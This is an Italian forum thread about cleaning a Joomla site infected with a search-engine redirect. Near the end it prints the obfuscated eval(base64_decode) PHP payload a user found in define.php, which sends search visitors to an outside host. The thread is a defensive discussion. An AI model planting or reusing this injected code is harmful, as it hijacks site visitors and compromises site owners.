[RISOLTO] problema di virus sul sito

[Argon]

Scusate
è ovvio che non serve a nulla eliminare filezilla!!!
è il troiano che si serve di filezilla
il problema non è filezilla in se ma i troiani che spaccia

comunque ho formattato il pc e reisntallato filezilla
adesso stiamo a vedere...
se non compare piu alcuna stringa avevo ragione

in alternativa se uno non può formattare, può utilizzare un altro pc...

ciao

[Otrebor1969]

Ma scusa l'ignoranza... ma gli antivirus a che servono? Io pago per il servizio e mi ritrovo in queste condizioni... Questo lo dico non per fare polemica inutile.... cmq vedremo...

[Otrebor1969]

Posso comunicarvi con assoluta certezza che anche sostituendo con l'unica copia di backup valida non ho risolto il problema.... SONO ALLA FRUTTA... adesso il sito è off line...

[Argon]

Posso comunicarvi con assoluta certezza che anche sostituendo con l'unica copia di backup valida non ho risolto il problema.... SONO ALLA FRUTTA... adesso il sito è off line...

Ciao, ti aggiorno

Ho fatto due cose:
formattato il pc e pulito il server.
Ho reinstallato joomla ed ora il codice è pulito da circa 12 ore, mi pare un buon segno. Però ho dovuto rifare tutto di sana pianta. Sicuramente c'era un altro metodo ma non l'ho trovato.
E siccome il trojan l'ho preso tramite pen drive...ho cambiato anche quello.
Ciao

[56francesco]

formattato il pc e

un piccolo suggerimento, non navigare con win ma con una ripartizione con ubuntu..
ad andar male ma proprio male male con quel s.o. apri un altro altro utente e cancelli quello precedente con dentro qualsiasi script che potesse putacaso intrufolarsi in qualche cartella del tuo pc..

[Otrebor1969]

E se facessi ricorso all'utilizzo di macchine virtuali?
Ma poi  perchè devo formattare la macchina se sono in possesso di antivirus?
Ritornando al problema principale:
- non abbiamo ancora rintracciato il codice malevolo.... Suggerimenti?
-in quali file devo cercare? In quali file potrebbe essere stato inserito codice? quale è il file che comanda il redirect da google?

[Argon]

E se facessi ricorso all'utilizzo di macchine virtuali?
Ma poi  perchè devo formattare la macchina se sono in possesso di antivirus?

perchè se ti sei preso qualcosa vuol dire che il tuo antivirus non ti ha coperto.

[Otrebor1969]

E se facessi ricorso all'utilizzo di macchine virtuali?
Ma poi  perchè devo formattare la macchina se sono in possesso di antivirus?

perchè se ti sei preso qualcosa vuol dire che il tuo antivirus non ti ha coperto.

Credo che la prova definitiva potrebbe essere quella di installare un joomla vergine.... che ne dici? Il confronto con le nostre esperienza potrebbe ricondurci alla logica deduzione che gli Antivirus a pagamento servono ma relativamente...

[mau_develop]

E se facessi ricorso all'utilizzo di macchine virtuali?
------------------------------------------------------
...con un ftp virtuale installando un joomla virtuale?
Se è un virus puoi fare ciò che più ti piace e credi, ma finchè non lo togli la situazione permane

PUNTUALIZZAZIONE: il fatto del virus io l'ho solo supposto, visto dove ridirigeva; e ogni volta che vieni spedito lì te lo ripigli se il browser è vulnerabile (e lo è )
Poi a quanto pare me lo ha confermato Argon... e non ho motivi per dirgli "non è vero". Il problema non mi riguarda e non riesco a vederelo perchè con linux non viene infettato ed eseguito nulla.

Ma poi  perchè devo formattare la macchina se sono in possesso di antivirus?
----------------------------------------------------------------
perchè a volte l'antivirus non basta, ma io non ti ho detto di formattare la macchina, solamente di verificare.
Se tu dici che non c'è nulla cosa faccio? vengo io?

Ritornando al problema principale:
- non abbiamo ancora rintracciato il codice malevolo.... Suggerimenti?
---------------------------------------------------------
...eccome no, ...se hai letto i post di pumacocina, anche lui non lo vedeva con gli editor che usava, non so perchè... ignoro windows...

-in quali file devo cercare?
---------------------------------
Se a tutto il mondo è stato iniettato il define non penso che a te sia successo qualcosa di diverso

quale è il file che comanda il redirect da google?
--------------------------------------------------
E' semplicemente un banalissimo script che vede da dove provieni, se provieni da motori di ricerca (non tutti) vieni redirettato su p3p etc.
Se accedi direttamente digitando il sito nella barra degli indirizzi non dovrebbe accadere.

...regà .... di più non posso proprio fare....

M.

[mau_develop]

Credo che la prova definitiva potrebbe essere quella di installare un joomla vergine.... che ne dici?
----------------------------------------------------------
...allora nn vuoi capire.... se il problema è un virus il problema si ripeterebbe

M.

[Otrebor1969]

Credo che la prova definitiva potrebbe essere quella di installare un joomla vergine.... che ne dici?
----------------------------------------------------------
...allora nn vuoi capire.... se il problema è un virus il problema si ripeterebbe

Si, hai ragione perchè dai per scontato che io abbia preso il virus che però non viene rilevato dall'antivirus... Ecco la proposta della controprova con un joomla vergine.... Era solamente una prova 
In ogni caso grazie per le informazioni che hai dato.. Ne farò tesoro.

[mau_develop]

prova a mandare una mail a pumacocina e chiedergli che antivirus ha usato.

E' importante seguire un metodo e non andare "in giro a fare"

... e soprattutto se si trova qualcosa fare un breve report così che anche altri abbiano notizie in più.

comunque se scarichi un editor php e apri quel define.php secondo me lo vedi... dai... nn è possibile che win sia così stupido...

M.

[Argon]

@Mau

ma quando uno script si insedia in joomla colpisce dei file particolari? Oppure ogni volta va cercato cartella per cartella?

Grazie

[Argon]

E se facessi ricorso all'utilizzo di macchine virtuali?
Ma poi  perchè devo formattare la macchina se sono in possesso di antivirus?

perchè se ti sei preso qualcosa vuol dire che il tuo antivirus non ti ha coperto.

Credo che la prova definitiva potrebbe essere quella di installare un joomla vergine.... che ne dici? Il confronto con le nostre esperienza potrebbe ricondurci alla logica deduzione che gli Antivirus a pagamento servono ma relativamente...

ti ripeto...
io alla fine ho formattato tutto, cercherò di proteggermi piu che posso da troian e virus...
si comunque joomla l'ho messa vergine, niente backup
rifaccio tutto daccapo

[Otrebor1969]

Si ok ne terrò conto. Il fatto è che rifare tutto il sito ex novo in questo momento è controproducente... Ritengo opportuno provare di tutto prima di prendere una decisione così drastica come anche quella di formattare. Nel frattempo, parlando con voi, mi sono fatto un'idea precisa di cosa fare: Lavorerò a tappe e con criterio logico.
Grazie mille a tutti per le info
P.S.: vi terrò aggiornati sulle evoluzioni e nel contempo sono graditi nuovi suggerimenti o strategie (Ora siamo in guerra eheheh) .

[Argon]

Si ok ne terrò conto. Il fatto è che rifare tutto il sito ex novo in questo momento è controproducente...

Controproducente?
Praticamente è come darsi una martellata dove fa male...
comunque mi sto guardando cartella per cartella di un sito joomla infetto ripulendo tutto.
Priaticamente ogni file index.html risulta infetto. A quanto pare il baco mangia tutto il codice e lascia la stringa malefica. Andando a logica rimpiazzando le cartelle da un pc pulito si va a sovrascrivere anche i file index.html corrotti...

http://www.x83.net/how-to-remove-malware-iframe-virus-from-your-site/
quì c'è un articolo interessante su iframe, spiega come si diffonde un virus di questo tipo

[mau_develop]

secondo me state facendo un casino della madonna.

iframe con qs cosa nn centra nulla, se guardi il codice non è un'iframe..

virus che fanno cose simili ce ne sono a pacchi

M.

[Otrebor1969]

Forse ho trovato:
*/ eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1J FRkVSRVJdLCJnb29nbGUiKSkgewoJaWYgKCFzdH Jpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sI i5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltI VFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJ pc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIm ludXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9K C4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0s JGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiY iKSkgewoJCQlwcmVnX21hdGNoICgiLyguKj8pXC YvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29yZ D11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNl IHsKCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1s xXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IG h0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cgp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRocnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

Allora:
- ho eliminato questa stringa dal define.php ed ora, almeno per ora,  funziona.
Non capisco come mai prima non lo vedessi, i file quando li aprivo erano puliti e li abbiamo esaminati in due.
Per vostra informazione li ho aperti con wordPad... Mah?!

[pumacocina]

Non so se ti possa essere utile:
avevo controllato anche tutti i link presenti e 1 sito era sicuramente infetto (con l'antivirus che uso, mentre aprendo lo stesso sito con altri pc che avevano un altro antivirus non si rilevava l'infezione).
 Ciao

[mau_develop]

almeno per ora,  funziona.
-------------------------

io invece non capisco perchè sostenevi di sovrascrivere i files...

M.